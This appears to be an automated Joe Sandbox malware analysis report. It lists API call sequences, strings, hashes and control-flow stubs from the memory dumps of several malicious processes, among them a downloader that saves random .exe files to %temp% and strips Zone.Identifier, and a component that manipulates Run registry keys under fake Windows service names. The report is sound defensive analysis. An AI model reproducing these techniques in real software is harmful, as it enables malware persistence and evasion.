                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Send$ErrorLastSleep
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2121970615-0
                                                                                                                                                                                              • Opcode ID: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                                                                                              • Instruction ID: 56798eeddd779857b304cdb020dc52eae5646efd672cabe94dca1e5c1b4e91c2
                                                                                                                                                                                              • Opcode Fuzzy Hash: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                                                                                              • Instruction Fuzzy Hash: 90014B712483046EE7209B96DC88F9B77A8EBC8711F408429F608DA2D0D7B5A9459B7A
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                                                                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2223660684-0
                                                                                                                                                                                              • Opcode ID: 3a256af2c019b276b8838bcc1186c61ecce618c98c01d702573358750c80b1c1
                                                                                                                                                                                              • Instruction ID: dfa7cd44099aa032f197b32b6ae0ce93fcebf173881def012ca395fa41330849
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a256af2c019b276b8838bcc1186c61ecce618c98c01d702573358750c80b1c1
                                                                                                                                                                                              • Instruction Fuzzy Hash: BD01F7356423049FC3209F26EC44ADB77F8AF49712B04443EE50693650DB34F545DB28
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000002,?,?,004083D7), ref: 00407398
                                                                                                                                                                                              • SysAllocString.OLEAUT32(004161D0), ref: 004073A3
                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 004073C8
                                                                                                                                                                                                • Part of subcall function 004073E0: SysFreeString.OLEAUT32(00000000), ref: 004075F8
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 004073C2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String$Free$AllocInitializeUninitialize
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 459949847-0
                                                                                                                                                                                              • Opcode ID: d549018ca7281a3a12c42c42db4c5aa0698fc19bb076c2a4b3e2f7f0a4b3168e
                                                                                                                                                                                              • Instruction ID: 94d3ecd3e534f0c2973a063d63be5db40503c7f445082467247c405133df6831
                                                                                                                                                                                              • Opcode Fuzzy Hash: d549018ca7281a3a12c42c42db4c5aa0698fc19bb076c2a4b3e2f7f0a4b3168e
                                                                                                                                                                                              • Instruction Fuzzy Hash: FEE01275944208FBD7049FA0ED0EB9D77649B04341F1041A5FD05A22A1DAF56E80D755
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00407670: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407690
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 004075F8
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateFreeInstanceString
                                                                                                                                                                                              • String ID: Microsoft Corporation
                                                                                                                                                                                              • API String ID: 586785272-3838278685
                                                                                                                                                                                              • Opcode ID: 803bccba2cddfb0e8a4aae8b96d6d08667bbe6654a4f0d67ac19fa841d2eca73
                                                                                                                                                                                              • Instruction ID: e42f15a5a8f3a5930d9f1f6311551bcb6c6e46ad7cdc057207f56e8781896ff9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 803bccba2cddfb0e8a4aae8b96d6d08667bbe6654a4f0d67ac19fa841d2eca73
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5191FB75E0450AAFCB14DB98CC94EAFB7B5BF48300F208169E505B73A0D735AE42CB66
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 0040E640: memset.NTDLL ref: 0040E668
                                                                                                                                                                                                • Part of subcall function 0040E640: InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
                                                                                                                                                                                                • Part of subcall function 0040E640: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
                                                                                                                                                                                                • Part of subcall function 0040E640: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
                                                                                                                                                                                                • Part of subcall function 0040E640: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
                                                                                                                                                                                                • Part of subcall function 0040E640: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
                                                                                                                                                                                                • Part of subcall function 0040E640: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
                                                                                                                                                                                                • Part of subcall function 0040E640: InternetCloseHandle.WININET(00000000), ref: 0040E837
                                                                                                                                                                                                • Part of subcall function 0040E530: SysAllocString.OLEAUT32(00000000), ref: 0040E55E
                                                                                                                                                                                                • Part of subcall function 0040E530: CoCreateInstance.OLE32(00413000,00000000,00004401,00412FF0,00000000), ref: 0040E586
                                                                                                                                                                                                • Part of subcall function 0040E530: SysFreeString.OLEAUT32(00000000), ref: 0040E621
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E4E5
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                                                                                                                              • String ID: %S%S
                                                                                                                                                                                              • API String ID: 1017111014-3267608656
                                                                                                                                                                                              • Opcode ID: 20876e0eb685dac13c64e0264db20ecd2e25c5e2071ea80cc012e61abc239ccc
                                                                                                                                                                                              • Instruction ID: e5c4592a6bf7e21b90caaa4e382eb9027ff93744cff569d410d2f086dfa1b48d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 20876e0eb685dac13c64e0264db20ecd2e25c5e2071ea80cc012e61abc239ccc
                                                                                                                                                                                              • Instruction Fuzzy Hash: 41415CB5D00209AFCB04DFE5C885AEFB7B5BF48304F104929E605B7390E738AA41CBA1
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000002,?,?,?,004083D2), ref: 0040E0CA
                                                                                                                                                                                                • Part of subcall function 0040E190: socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
                                                                                                                                                                                                • Part of subcall function 0040E190: htons.WS2_32(0000076C), ref: 0040E1E0
                                                                                                                                                                                                • Part of subcall function 0040E190: inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
                                                                                                                                                                                                • Part of subcall function 0040E190: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D
                                                                                                                                                                                                • Part of subcall function 0040E190: bind.WS2_32(000000FF,?,00000010), ref: 0040E243
                                                                                                                                                                                                • Part of subcall function 0040E190: lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
                                                                                                                                                                                                • Part of subcall function 0040E190: sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
                                                                                                                                                                                                • Part of subcall function 0040E190: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285
                                                                                                                                                                                                • Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
                                                                                                                                                                                                • Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4E5
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                                                                                                                              • String ID: TCP$UDP
                                                                                                                                                                                              • API String ID: 1519345861-1097902612
                                                                                                                                                                                              • Opcode ID: 4d93ce47139e5fe62163282bdde6dfb132a2b2f81b545c1a314b9c0cb3165857
                                                                                                                                                                                              • Instruction ID: 4536849a39b1ff6f82dd019fff268beff13b49d9c24eb1714a693627677867a5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d93ce47139e5fe62163282bdde6dfb132a2b2f81b545c1a314b9c0cb3165857
                                                                                                                                                                                              • Instruction Fuzzy Hash: C511B4B4E00208EBDB00EFD6DC45BAE7375AB44708F10896AE5047B2C2D6799E21CB89
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040DD10
                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040DD29
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseHandleObjectSingleWait
                                                                                                                                                                                              • String ID: .#v
                                                                                                                                                                                              • API String ID: 528846559-507759092
                                                                                                                                                                                              • Opcode ID: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
                                                                                                                                                                                              • Instruction ID: afdab107b7ea46b491ba3f785a3108c34962e981a5b403661ae60ceb940f9cda
                                                                                                                                                                                              • Opcode Fuzzy Hash: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F11C974A04208EFDB14CF84C580B59B7B6FF49314F2081AAEC06AB381C775EE42DB95
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00415B88,?,00000000,?), ref: 00405EFF
                                                                                                                                                                                              • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F3E
                                                                                                                                                                                              • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405FB3
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00415B88), ref: 00405FD0
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSectionmemcpy$EnterLeave
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 469056452-0
                                                                                                                                                                                              • Opcode ID: 6f0f4f80585b29744b6880eeb75b2d3a88a0070be33d566f9884971b99258328
                                                                                                                                                                                              • Instruction ID: 31cd86352096c342a95fcbe165c6b10336903156d0058c686e7ee331cda8bfc5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f0f4f80585b29744b6880eeb75b2d3a88a0070be33d566f9884971b99258328
                                                                                                                                                                                              • Instruction Fuzzy Hash: 08218D35D04609EFDB04DB94D885BDEBB71EB44304F1481BAE8096B380D37CA985CF8A

                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                              Execution Coverage:22.2%
                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                              Total number of Nodes:3
                                                                                                                                                                                              Total number of Limit Nodes:0

                                                                                                                                                                                              Callgraph

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2608095196.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ffd34780000_1881231804.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: InformationQuerySystem
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3562636166-0
                                                                                                                                                                                              • Opcode ID: f1b3f1ef9c2b2f814db49f1918cfcc124dc12fb0526d07b879c0f52f5e0fc590
                                                                                                                                                                                              • Instruction ID: 3baa2727cb223fb682e387481429bbbaaee63f2a9082a24f8236fac982c3d3f8
                                                                                                                                                                                              • Opcode Fuzzy Hash: f1b3f1ef9c2b2f814db49f1918cfcc124dc12fb0526d07b879c0f52f5e0fc590
                                                                                                                                                                                              • Instruction Fuzzy Hash: C931C530A0CB489FDB18DF98D8856F9BBF1EB56311F04426FD049D3652CB656856CB81

                                                                                                                                                                                              Callgraph

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 008710AB
                                                                                                                                                                                                • Part of subcall function 00871000: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0087101A
                                                                                                                                                                                                • Part of subcall function 00871000: wsprintfW.USER32 ref: 00871033
                                                                                                                                                                                                • Part of subcall function 00871000: PathFileExistsW.KERNELBASE(?), ref: 00871043
                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,00020006,?), ref: 00871123
                                                                                                                                                                                              • RegDeleteValueW.KERNELBASE(?,Microsoft Windows Service), ref: 00871151
                                                                                                                                                                                              • RegCloseKey.KERNELBASE(?), ref: 0087115D
                                                                                                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 00871168
                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,00020006,?), ref: 00871183
                                                                                                                                                                                              • RegDeleteValueW.KERNELBASE(?,Microsoft Windows Service), ref: 008711B1
                                                                                                                                                                                              • RegCloseKey.KERNELBASE(?), ref: 008711BD
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • Windows Update 4950505060, xrefs: 008710E2
                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00871119
                                                                                                                                                                                              • Microsoft Windows Driver, xrefs: 008710C6
                                                                                                                                                                                              • Host Process for Windows Services, xrefs: 008710CD
                                                                                                                                                                                              • Windows Update 75849348, xrefs: 008710D4
                                                                                                                                                                                              • Microsoft Windows Service, xrefs: 008710B1, 0087114C, 008711AC
                                                                                                                                                                                              • Microsoft Windows Update Service, xrefs: 008710BF
                                                                                                                                                                                              • Windows Operating System, xrefs: 008710F7
                                                                                                                                                                                              • Windows Upgrade Manager, xrefs: 008710F0
                                                                                                                                                                                              • Windows Update 46363463464, xrefs: 008710DB
                                                                                                                                                                                              • Microsoft Windows Services, xrefs: 008710B8
                                                                                                                                                                                              • Windows Upgrade 40885040, xrefs: 008710E9
                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00871179
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2688470052.0000000000871000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                              • Associated: 0000001A.00000002.2688453395.0000000000870000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001A.00000002.2688482531.0000000000872000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001A.00000002.2688495172.0000000000873000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001A.00000002.2688507252.0000000000874000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001A.00000002.2688538686.0000000000875000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_870000_2314627202.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseDeleteOpenSleepValue$EnvironmentExistsExpandFilePathStringswsprintf
                                                                                                                                                                                              • String ID: Host Process for Windows Services$Microsoft Windows Driver$Microsoft Windows Service$Microsoft Windows Services$Microsoft Windows Update Service$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Windows Operating System$Windows Update 46363463464$Windows Update 4950505060$Windows Update 75849348$Windows Upgrade 40885040$Windows Upgrade Manager
                                                                                                                                                                                              • API String ID: 2575504554-1382139348
                                                                                                                                                                                              • Opcode ID: c65f902f934c83052143c3865d32c0c7647140f5d8f91edb7961659dbe7443d8
                                                                                                                                                                                              • Instruction ID: fc8a28247a7801a0182103022d19148380bda9d21c504338a86d7f103b5c75c8
                                                                                                                                                                                              • Opcode Fuzzy Hash: c65f902f934c83052143c3865d32c0c7647140f5d8f91edb7961659dbe7443d8
                                                                                                                                                                                              • Instruction Fuzzy Hash: 94310570A11218ABDF14DFD8ED8CAADBBB5FB04319F508008F619AA249D7B4D588DB64

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 16 871000-87104b ExpandEnvironmentStringsW wsprintfW PathFileExistsW 17 871053-87107c 16->17 18 87104d-87104f 16->18 21 87107e-871084 17->21 22 87108b 17->22 19 87108d-871090 18->19 21->22 22->19
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0087101A
                                                                                                                                                                                              • wsprintfW.USER32 ref: 00871033
                                                                                                                                                                                              • PathFileExistsW.KERNELBASE(?), ref: 00871043
                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00871069
                                                                                                                                                                                              • CloseHandle.KERNELBASE(000000FF), ref: 00871085
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2688470052.0000000000871000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                              • Associated: 0000001A.00000002.2688453395.0000000000870000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001A.00000002.2688482531.0000000000872000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001A.00000002.2688495172.0000000000873000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001A.00000002.2688507252.0000000000874000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001A.00000002.2688538686.0000000000875000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_870000_2314627202.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
                                                                                                                                                                                              • String ID: %s\dd55ddff6fd.txt$%temp%$@1#v.#v
                                                                                                                                                                                              • API String ID: 750032643-2014613978
                                                                                                                                                                                              • Opcode ID: 83aa69ef25aec3abbd699558a5a011d4588db81225a1402c3bb11f7578dba58c
                                                                                                                                                                                              • Instruction ID: 4b7b48895c96407170c86acd4f52b9001bd2e745ec92eff89ecf25286bcab801
                                                                                                                                                                                              • Opcode Fuzzy Hash: 83aa69ef25aec3abbd699558a5a011d4588db81225a1402c3bb11f7578dba58c
                                                                                                                                                                                              • Instruction Fuzzy Hash: BF014FB4940718ABDB209B609C4EFE67378FB44704F008694A62DA61D6DAB0DAC5CFB5

                                                                                                                                                                                              Callgraph

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 006010B9
                                                                                                                                                                                              • srand.MSVCR90 ref: 006010C0
                                                                                                                                                                                              • DeleteUrlCacheEntryW.WININET(?), ref: 006010CC
                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 006010EA
                                                                                                                                                                                              • rand.MSVCR90 ref: 006010F0
                                                                                                                                                                                              • rand.MSVCR90 ref: 00601104
                                                                                                                                                                                              • wsprintfW.USER32 ref: 0060112B
                                                                                                                                                                                              • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00601141
                                                                                                                                                                                              • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0060116D
                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0060119C
                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,00000103,?), ref: 006011CF
                                                                                                                                                                                              • WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 00601200
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0060120F
                                                                                                                                                                                              • wsprintfW.USER32 ref: 00601228
                                                                                                                                                                                              • DeleteFileW.KERNELBASE(?), ref: 00601238
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 00601263
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00601270
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0060127D
                                                                                                                                                                                              • Sleep.KERNELBASE(000001F4), ref: 00601288
                                                                                                                                                                                              • rand.MSVCR90 ref: 0060129D
                                                                                                                                                                                              • Sleep.KERNEL32 ref: 006012B4
                                                                                                                                                                                              • rand.MSVCR90 ref: 006012BA
                                                                                                                                                                                              • rand.MSVCR90 ref: 006012CE
                                                                                                                                                                                              • wsprintfW.USER32 ref: 006012F5
                                                                                                                                                                                              • DeleteUrlCacheEntryW.WININET(?), ref: 00601302
                                                                                                                                                                                              • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 00601319
                                                                                                                                                                                              • wsprintfW.USER32 ref: 00601335
                                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 00601345
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, xrefs: 0060113C
                                                                                                                                                                                              • %s\%d%d.exe, xrefs: 006012E9
                                                                                                                                                                                              • %s\%d%d.exe, xrefs: 0060111F
                                                                                                                                                                                              • %temp%, xrefs: 006010E5
                                                                                                                                                                                              • %s:Zone.Identifier, xrefs: 0060121C
                                                                                                                                                                                              • %s:Zone.Identifier, xrefs: 00601329
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.2811489947.0000000000601000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                              • Associated: 0000001B.00000002.2811282068.0000000000600000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001B.00000002.2811517821.0000000000602000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001B.00000002.2811541210.0000000000604000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_600000_1091722296.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$Internetrand$CloseDeleteHandlewsprintf$CacheEntryOpenSleep$CountCreateDownloadEnvironmentExpandReadStringsTickWritesrand
                                                                                                                                                                                              • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                                                              • API String ID: 3548267932-1161929716
                                                                                                                                                                                              • Opcode ID: 3748b016520c6066b6d911f41a8a4837a1e3d5c8fae42f197566fc163cf47010
                                                                                                                                                                                              • Instruction ID: 8b64483210778f26279b9ea21b2f583aaab9654ac928e8c07aa5908f0be71262
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3748b016520c6066b6d911f41a8a4837a1e3d5c8fae42f197566fc163cf47010
                                                                                                                                                                                              • Instruction Fuzzy Hash: 676195B5980319ABDB28DB60DC5DFEB737BAF48701F044498F60A961D0DA746B84CF64

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
